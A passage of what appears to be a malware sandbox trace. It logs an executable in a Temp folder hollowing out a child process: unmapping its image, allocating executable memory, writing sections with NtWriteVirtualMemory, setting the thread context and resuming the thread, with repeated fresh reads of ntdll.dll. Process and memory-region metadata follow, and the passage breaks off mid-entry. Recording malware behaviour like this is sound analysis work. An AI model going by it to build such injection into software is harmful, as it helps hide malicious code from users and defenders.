ReadFile (in: hFile=0x1ec, lpBuffer=0x2070000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19eac4, lpOverlapped=0x0 | out: lpBuffer=0x2070000*, lpNumberOfBytesRead=0x19eac4*=0x1784a0, lpOverlapped=0x0) returned 1 [0122.567] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x21f0000 [0122.609] CloseHandle (hObject=0x1ec) returned 1 [0122.609] VirtualFree (lpAddress=0x2070000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.637] VirtualFree (lpAddress=0x21f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.659] NtUnmapViewOfSection (ProcessHandle=0x1e4, BaseAddress=0x400000) returned 0x0 [0122.662] VirtualAllocEx (hProcess=0x1e4, lpAddress=0x400000, dwSize=0xa2000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0122.671] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19eac4 | out: Wow64Process=0x19eac4*=1) returned 1 [0122.671] lstrlenW (lpString="cbgsujmwws.exe") returned 14 [0122.671] lstrlenW (lpString="ntdll.dll") returned 9 [0122.671] lstrlenW (lpString="ntdll.dll") returned 9 [0122.671] lstrlenW (lpString="ntdll.dll") returned 9 [0122.671] lstrlenW (lpString="ntdll.dll") returned 9 [0122.672] lstrlenW (lpString="tdll.dll") returned 8 [0122.672] lstrlenW (lpString="dll.dll") returned 7 [0122.672] lstrlenW (lpString="ll.dll") returned 6 [0122.672] lstrlenW (lpString="l.dll") returned 5 [0122.672] lstrlenW (lpString=".dll") returned 4 [0122.672] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0122.672] GetFileSize (in: hFile=0x1ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0122.672] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2070000 [0122.673] ReadFile (in: hFile=0x1ec, lpBuffer=0x2070000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ea94, lpOverlapped=0x0 | out: lpBuffer=0x2070000*, lpNumberOfBytesRead=0x19ea94*=0x1784a0, lpOverlapped=0x0) returned 1 [0122.713] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x21f0000 [0122.761] CloseHandle (hObject=0x1ec) returned 1 [0122.761] VirtualFree (lpAddress=0x2070000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.782] VirtualFree (lpAddress=0x21f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.809] NtWriteVirtualMemory (in: ProcessHandle=0x1e4, BaseAddress=0x400000, Buffer=0x450000*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x19eaf8 | out: Buffer=0x450000*, NumberOfBytesWritten=0x19eaf8*=0x400) returned 0x0 [0122.851] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19eac4 | out: Wow64Process=0x19eac4*=1) returned 1 [0122.851] lstrlenW (lpString="cbgsujmwws.exe") returned 14 [0122.851] lstrlenW (lpString="ntdll.dll") returned 9 [0122.851] lstrlenW (lpString="ntdll.dll") returned 9 [0122.851] lstrlenW (lpString="ntdll.dll") returned 9 [0122.851] lstrlenW (lpString="ntdll.dll") returned 9 [0122.852] lstrlenW (lpString="tdll.dll") returned 8 [0122.852] lstrlenW (lpString="dll.dll") returned 7 [0122.852] lstrlenW (lpString="ll.dll") returned 6 [0122.852] lstrlenW (lpString="l.dll") returned 5 [0122.852] lstrlenW (lpString=".dll") returned 4 [0122.852] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0122.853] GetFileSize (in: hFile=0x1ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0122.853] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2070000 [0122.854] ReadFile (in: hFile=0x1ec, lpBuffer=0x2070000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ea94, lpOverlapped=0x0 | out: lpBuffer=0x2070000*, lpNumberOfBytesRead=0x19ea94*=0x1784a0, lpOverlapped=0x0) returned 1 [0122.884] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x21f0000 [0122.923] CloseHandle (hObject=0x1ec) returned 1 [0122.923] VirtualFree (lpAddress=0x2070000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.956] VirtualFree (lpAddress=0x21f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.977] NtWriteVirtualMemory (in: ProcessHandle=0x1e4, BaseAddress=0x401000, Buffer=0x450400*, NumberOfBytesToWrite=0x13800, NumberOfBytesWritten=0x19eaf8 | out: Buffer=0x450400*, NumberOfBytesWritten=0x19eaf8*=0x13800) returned 0x0 [0123.062] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19eac4 | out: Wow64Process=0x19eac4*=1) returned 1 [0123.062] lstrlenW (lpString="cbgsujmwws.exe") returned 14 [0123.062] lstrlenW (lpString="ntdll.dll") returned 9 [0123.062] lstrlenW (lpString="ntdll.dll") returned 9 [0123.062] lstrlenW (lpString="ntdll.dll") returned 9 [0123.062] lstrlenW (lpString="ntdll.dll") returned 9 [0123.062] lstrlenW (lpString="tdll.dll") returned 8 [0123.062] lstrlenW (lpString="dll.dll") returned 7 [0123.062] lstrlenW (lpString="ll.dll") returned 6 [0123.062] lstrlenW (lpString="l.dll") returned 5 [0123.062] lstrlenW (lpString=".dll") returned 4 [0123.062] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0123.063] GetFileSize (in: hFile=0x1ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0123.063] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2070000 [0123.063] ReadFile (in: hFile=0x1ec, lpBuffer=0x2070000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ea94, lpOverlapped=0x0 | out: lpBuffer=0x2070000*, lpNumberOfBytesRead=0x19ea94*=0x1784a0, lpOverlapped=0x0) returned 1 [0123.094] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x21f0000 [0123.153] CloseHandle (hObject=0x1ec) returned 1 [0123.154] VirtualFree (lpAddress=0x2070000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0123.179] VirtualFree (lpAddress=0x21f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0123.257] NtWriteVirtualMemory (in: ProcessHandle=0x1e4, BaseAddress=0x415000, Buffer=0x463c00*, NumberOfBytesToWrite=0x4200, NumberOfBytesWritten=0x19eaf8 | out: Buffer=0x463c00*, NumberOfBytesWritten=0x19eaf8*=0x4200) returned 0x0 [0123.279] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19eac4 | out: Wow64Process=0x19eac4*=1) returned 1 [0123.279] lstrlenW (lpString="cbgsujmwws.exe") returned 14 [0123.279] lstrlenW (lpString="ntdll.dll") returned 9 [0123.279] lstrlenW (lpString="ntdll.dll") returned 9 [0123.279] lstrlenW (lpString="ntdll.dll") returned 9 [0123.280] lstrlenW (lpString="ntdll.dll") returned 9 [0123.280] lstrlenW (lpString="tdll.dll") returned 8 [0123.280] lstrlenW (lpString="dll.dll") returned 7 [0123.280] lstrlenW (lpString="ll.dll") returned 6 [0123.280] lstrlenW (lpString="l.dll") returned 5 [0123.280] lstrlenW (lpString=".dll") returned 4 [0123.280] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0123.281] GetFileSize (in: hFile=0x1ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0123.281] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2070000 [0123.281] ReadFile (in: hFile=0x1ec, lpBuffer=0x2070000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ea94, lpOverlapped=0x0 | out: lpBuffer=0x2070000*, lpNumberOfBytesRead=0x19ea94*=0x1784a0, lpOverlapped=0x0) returned 1 [0123.358] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x21f0000 [0123.434] CloseHandle (hObject=0x1ec) returned 1 [0123.435] VirtualFree (lpAddress=0x2070000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0123.452] VirtualFree (lpAddress=0x21f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0123.469] NtWriteVirtualMemory (in: ProcessHandle=0x1e4, BaseAddress=0x41a000, Buffer=0x467e00*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x19eaf8 | out: Buffer=0x467e00*, NumberOfBytesWritten=0x19eaf8*=0x200) returned 0x0 [0123.506] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19eac4 | out: Wow64Process=0x19eac4*=1) returned 1 [0123.506] lstrlenW (lpString="cbgsujmwws.exe") returned 14 [0123.506] lstrlenW (lpString="ntdll.dll") returned 9 [0123.506] lstrlenW (lpString="ntdll.dll") returned 9 [0123.506] lstrlenW (lpString="ntdll.dll") returned 9 [0123.506] lstrlenW (lpString="ntdll.dll") returned 9 [0123.506] lstrlenW (lpString="tdll.dll") returned 8 [0123.507] lstrlenW (lpString="dll.dll") returned 7 [0123.507] lstrlenW (lpString="ll.dll") returned 6 [0123.507] lstrlenW (lpString="l.dll") returned 5 [0123.507] lstrlenW (lpString=".dll") returned 4 [0123.507] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0123.507] GetFileSize (in: hFile=0x1ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0123.507] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2070000 [0123.507] ReadFile (in: hFile=0x1ec, lpBuffer=0x2070000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ea94, lpOverlapped=0x0 | out: lpBuffer=0x2070000*, lpNumberOfBytesRead=0x19ea94*=0x1784a0, lpOverlapped=0x0) returned 1 [0123.546] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x21f0000 [0123.814] CloseHandle (hObject=0x1ec) returned 1 [0123.814] VirtualFree (lpAddress=0x2070000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0123.835] VirtualFree (lpAddress=0x21f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0123.953] NtWriteVirtualMemory (in: ProcessHandle=0x1e4, BaseAddress=0x4a0000, Buffer=0x468000*, NumberOfBytesToWrite=0x2000, NumberOfBytesWritten=0x19eaf8 | out: Buffer=0x468000*, NumberOfBytesWritten=0x19eaf8*=0x2000) returned 0x0 [0124.327] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19eac4 | out: Wow64Process=0x19eac4*=1) returned 1 [0124.328] lstrlenW (lpString="cbgsujmwws.exe") returned 14 [0124.328] lstrlenW (lpString="ntdll.dll") returned 9 [0124.328] lstrlenW (lpString="ntdll.dll") returned 9 [0124.328] lstrlenW (lpString="ntdll.dll") returned 9 [0124.328] lstrlenW (lpString="ntdll.dll") returned 9 [0124.328] lstrlenW (lpString="tdll.dll") returned 8 [0124.328] lstrlenW (lpString="dll.dll") returned 7 [0124.328] lstrlenW (lpString="ll.dll") returned 6 [0124.329] lstrlenW (lpString="l.dll") returned 5 [0124.329] lstrlenW (lpString=".dll") returned 4 [0124.329] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0124.329] GetFileSize (in: hFile=0x1ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0124.329] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2070000 [0124.330] ReadFile (in: hFile=0x1ec, lpBuffer=0x2070000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ea94, lpOverlapped=0x0 | out: lpBuffer=0x2070000*, lpNumberOfBytesRead=0x19ea94*=0x1784a0, lpOverlapped=0x0) returned 1 [0124.423] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x21f0000 [0124.634] CloseHandle (hObject=0x1ec) returned 1 [0124.635] VirtualFree (lpAddress=0x2070000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.762] VirtualFree (lpAddress=0x21f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.785] NtWriteVirtualMemory (in: ProcessHandle=0x1e4, BaseAddress=0x24e008, Buffer=0x19f294*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x19eaf8 | out: Buffer=0x19f294*, NumberOfBytesWritten=0x19eaf8*=0x4) returned 0x0 [0124.796] SetThreadContext (hThread=0x1e0, lpContext=0x19ef3c*(ContextFlags=0x10007, Dr0=0x7786a1fe, Dr1=0x19ef9c, Dr2=0x19f038, Dr3=0x7a0, Dr6=0x1a1e64, Dr7=0x536cd652, FloatSave.ControlWord=0x10, FloatSave.StatusWord=0x7788a260, FloatSave.TagWord=0x19f001, FloatSave.ErrorOffset=0x19f080, FloatSave.ErrorSelector=0x1a1714, FloatSave.DataOffset=0xa, FloatSave.DataSelector=0x101efd4, FloatSave.RegisterArea=([0]=0x52, [1]=0xd6, [2]=0x6c, [3]=0x53, [4]=0x7c, [5]=0x1, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0xec, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x2, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0xa4, [25]=0x5d, [26]=0x6e, [27]=0x9, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x25, [33]=0x2, [34]=0x0, [35]=0xc0, [36]=0x80, [37]=0xf0, [38]=0x19, [39]=0x0, [40]=0x38, [41]=0xf0, [42]=0x19, [43]=0x0, [44]=0xf4, [45]=0xef, [46]=0x19, [47]=0x0, [48]=0x0, [49]=0xf0, [50]=0x19, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0xf4, [65]=0xf0, [66]=0x19, [67]=0x0, [68]=0xa4, [69]=0x9c, [70]=0x86, [71]=0x77, [72]=0xf4, [73]=0x5d, [74]=0x6e, [75]=0x9, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x552168, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x24e000, Edx=0x0, Ecx=0x0, Eax=0x4139de, Ebp=0x0, Eip=0x778a8fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0xf0, [1]=0xf1, [2]=0x19, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x25, [9]=0x2, [10]=0x0, [11]=0xc0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x30, [17]=0xf0, [18]=0x19, [19]=0x0, [20]=0x2b, [21]=0xba, [22]=0x86, [23]=0x77, [24]=0xb8, [25]=0xf0, [26]=0x19, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x9, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x80, [41]=0xf0, [42]=0x19, [43]=0x0, [44]=0x33, [45]=0xb8, [46]=0x86, [47]=0x77, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x59, [53]=0xb8, [54]=0x86, [55]=0x77, [56]=0xb4, [57]=0x42, [58]=0x6e, [59]=0x9, [60]=0xf8, [61]=0xf1, [62]=0x19, [63]=0x0, [64]=0x88, [65]=0xf2, [66]=0x19, [67]=0x0, [68]=0xf0, [69]=0xf1, [70]=0x19, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x94, [77]=0xf1, [78]=0x19, [79]=0x0, [80]=0xb8, [81]=0xf0, [82]=0x19, [83]=0x0, [84]=0xf8, [85]=0xf1, [86]=0x19, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x40, [97]=0xf0, [98]=0x19, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x70, [105]=0xff, [106]=0x19, [107]=0x0, [108]=0x30, [109]=0xee, [110]=0x8a, [111]=0x77, [112]=0x1c, [113]=0x93, [114]=0xe5, [115]=0x7e, [116]=0xfe, [117]=0xff, [118]=0xff, [119]=0xff, [120]=0x59, [121]=0xb8, [122]=0x86, [123]=0x77, [124]=0x9e, [125]=0x1, [126]=0x87, [127]=0x77, [128]=0x20, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x4, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0xf0, [145]=0xf1, [146]=0x19, [147]=0x0, [148]=0xb4, [149]=0xf0, [150]=0x19, [151]=0x0, [152]=0x1, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x88, [157]=0xf2, [158]=0x19, [159]=0x0, [160]=0xc0, [161]=0x1, [162]=0x87, [163]=0x77, [164]=0x6c, [165]=0xf1, [166]=0x19, [167]=0x0, [168]=0x20, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x12, [177]=0x0, [178]=0x0, [179]=0x1, [180]=0xc0, [181]=0xf0, [182]=0x19, [183]=0x0, [184]=0x6e, [185]=0x0, [186]=0x74, [187]=0x0, [188]=0x64, [189]=0x0, [190]=0x6c, [191]=0x0, [192]=0x6c, [193]=0x0, [194]=0x2e, [195]=0x0, [196]=0x64, [197]=0x0, [198]=0x6c, [199]=0x0, [200]=0x6c, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x6c, [205]=0xf1, [206]=0x19, [207]=0x0, [208]=0x40, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0xc4, [273]=0xf1, [274]=0x19, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x16, [281]=0x0, [282]=0x18, [283]=0x0, [284]=0xc, [285]=0xfc, [286]=0x19, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x80, [291]=0x0, [292]=0xc0, [293]=0xf1, [294]=0x19, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x1, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0xb0, [306]=0x31, [307]=0x0, [308]=0x0, [309]=0xe0, [310]=0x31, [311]=0x0, [312]=0xd4, [313]=0x57, [314]=0x68, [315]=0xf4, [316]=0xc8, [317]=0x42, [318]=0x6e, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x2, [323]=0x0, [324]=0x60, [325]=0xf1, [326]=0x19, [327]=0x0, [328]=0x60, [329]=0xf1, [330]=0x19, [331]=0x0, [332]=0x60, [333]=0xf1, [334]=0x19, [335]=0x0, [336]=0x2, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x2, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x58, [349]=0x43, [350]=0x6e, [351]=0x9, [352]=0xe4, [353]=0xf2, [354]=0x19, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0xb5, [361]=0x93, [362]=0x86, [363]=0x77, [364]=0xc, [365]=0xf2, [366]=0x19, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x2c, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x80, [377]=0xf7, [378]=0x19, [379]=0x0, [380]=0xc, [381]=0xfc, [382]=0x19, [383]=0x0, [384]=0x30, [385]=0x94, [386]=0x86, [387]=0x77, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x1, [396]=0x16, [397]=0x0, [398]=0x18, [399]=0x0, [400]=0xc, [401]=0xfc, [402]=0x19, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x48, [429]=0xf7, [430]=0x19, [431]=0x0, [432]=0x9c, [433]=0xb7, [434]=0x86, [435]=0x77, [436]=0xf8, [437]=0xf1, [438]=0x19, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x98, [445]=0x42, [446]=0x6e, [447]=0x9, [448]=0x1, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x50, [453]=0xf2, [454]=0x19, [455]=0x0, [456]=0x1, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0xcd, [469]=0x35, [470]=0x87, [471]=0x77, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x9, [481]=0x36, [482]=0x87, [483]=0x77, [484]=0x0, [485]=0xf2, [486]=0x19, [487]=0x0, [488]=0x68, [489]=0x21, [490]=0x55, [491]=0x0, [492]=0x7c, [493]=0xf2, [494]=0x19, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x48, [509]=0xf7, [510]=0x19, [511]=0x0))) returned 1 [0124.806] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19eaec | out: Wow64Process=0x19eaec*=1) returned 1 [0124.810] lstrlenW (lpString="cbgsujmwws.exe") returned 14 [0124.810] lstrlenW (lpString="ntdll.dll") returned 9 [0124.810] lstrlenW (lpString="ntdll.dll") returned 9 [0124.810] lstrlenW (lpString="ntdll.dll") returned 9 [0124.810] lstrlenW (lpString="ntdll.dll") returned 9 [0124.810] lstrlenW (lpString="tdll.dll") returned 8 [0124.810] lstrlenW (lpString="dll.dll") returned 7 [0124.810] lstrlenW (lpString="ll.dll") returned 6 [0124.810] lstrlenW (lpString="l.dll") returned 5 [0124.810] lstrlenW (lpString=".dll") returned 4 [0124.810] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0124.811] GetFileSize (in: hFile=0x1ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0124.811] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2070000 [0124.811] ReadFile (in: hFile=0x1ec, lpBuffer=0x2070000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19eabc, lpOverlapped=0x0 | out: lpBuffer=0x2070000*, lpNumberOfBytesRead=0x19eabc*=0x1784a0, lpOverlapped=0x0) returned 1 [0124.844] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x21f0000 [0124.886] CloseHandle (hObject=0x1ec) returned 1 [0124.886] VirtualFree (lpAddress=0x2070000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.917] VirtualFree (lpAddress=0x21f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.939] NtResumeThread (in: ThreadHandle=0x1e0, SuspendCount=0x19eb08 | out: SuspendCount=0x19eb08*=0x1) returned 0x0 [0125.017] ExitProcess (uExitCode=0x0) Thread: id = 6 os_tid = 0x89c Thread: id = 7 os_tid = 0x8f0 Process: id = "3" image_name = "cbgsujmwws.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\cbgsujmwws.exe" page_root = "0x6db01000" os_pid = "0x93c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xe48" cmd_line = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jplmbcuny" cur_dir = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 444 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 445 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 446 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 447 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 448 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 449 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 450 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 451 start_va = 0x1c0000 end_va = 0x1c1fff 